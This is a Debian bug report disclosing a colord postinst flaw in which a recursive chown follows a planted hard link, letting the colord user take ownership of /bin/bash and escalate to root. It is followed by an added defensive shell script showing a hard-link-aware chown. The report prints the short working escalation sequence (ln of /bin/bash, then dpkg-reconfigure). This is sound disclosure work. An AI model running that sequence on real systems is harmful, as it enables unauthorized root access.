Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0
Hi Ansgar,

> now hoping every other `chmod -R` call gets a CVE assigned

See #889066 for a Lintian check for this.

Regards,

-- 
Chris Lamb
la...@debian.org / chris-lamb.co.uk
Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0
Package: colord
Version: 1.3.3-2
Severity: important
Tags: security

On systems with fs.protected_hardlinks=0 the postinst script allows escalation from the colord user to root:

+---
| # sysctl fs.protected_hardlinks=0
| # runuser -u colord ln /bin/bash /var/lib/colord/bash
| # ls -l /bin/bash
| -rwxr-xr-x 2 root root 1099016 May 15  2017 /bin/bash
| # dpkg-reconfigure colord
| # ls -l /bin/bash
| -rwxr-xr-x 2 colord colord 1099016 May 15  2017 /bin/bash
+---

This is essentially the same problem as CVE-2017-18078.

Ansgar
(now hoping every other `chmod -R` call gets a CVE assigned)
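The report above shows why a recursive chown over a directory that a less privileged user can write to is dangerous when hard links are unrestricted: the planted link shares its inode with /bin/bash, so chowning the link chowns the binary. The script below is an added illustration, not colord's postinst and not a patch from the bug report. It puts the naive pattern next to a variant that skips any regular file with more than one link, and exercises both on a constructed temporary tree (the `victim/target` and `state/` paths are made up stand-ins for /bin/bash and /var/lib/colord; all function names are this example's own). The safe variant is still a check-then-act sequence, so it narrows the window rather than closing it; the durable fix is fs.protected_hardlinks=1 and not running ownership fixes over trees an unprivileged user controls.

```shell
#!/bin/sh
# Added example: hard-link-aware replacement for a blanket `chown -R` in a
# maintainer script. Illustrative code only, not colord's postinst.

# The vulnerable pattern: every name under $1 is chowned. A hard link shares
# its inode with the original, so a link planted by the owner of $1 hands
# that user ownership of the link target (/bin/bash in the bug report).
chown_tree_naive() {
    chown -R "$2" "$1"
}

# Print regular files under $1 (same filesystem only) whose link count is
# above 1. Each such file has at least one other name on the filesystem.
list_hardlinked() {
    find "$1" -xdev -type f -links +1
}

# Fix ownership of $1 to $2, touching only directories and regular files
# with exactly one link. Symlinks are never followed (-h); multi-linked
# files are reported on stderr and left alone.
# Caveat: a link created between the check and the chown is still missed.
chown_tree_safe() {
    dir=$1
    owner=$2
    list_hardlinked "$dir" \
        | sed 's/^/chown_tree_safe: skipping hard-linked file: /' >&2
    find "$dir" -xdev \( -type d -o \( -type f -links 1 \) \) \
        -exec chown -h "$owner" {} +
}

# Demo on a constructed tree: "victim/target" stands in for /bin/bash,
# "state" for /var/lib/colord, "planted" for the attacker's hard link.
# Ownership is set to the current user so the demo works without root.
demo() {
    work=$(mktemp -d)
    mkdir "$work/victim" "$work/state"
    printf 'x' > "$work/victim/target"
    printf 'y' > "$work/state/plain"
    ln "$work/victim/target" "$work/state/planted"
    echo "hard-linked files under state/:"
    list_hardlinked "$work/state"
    chown_tree_safe "$work/state" "$(id -un)"
    rm -rf "$work"
}

if [ "${1:-}" = demo ]; then
    demo
fi
```

Run it as `sh example.sh demo` to see the planted link reported and skipped; `chown_tree_naive` is included only for contrast and is never called.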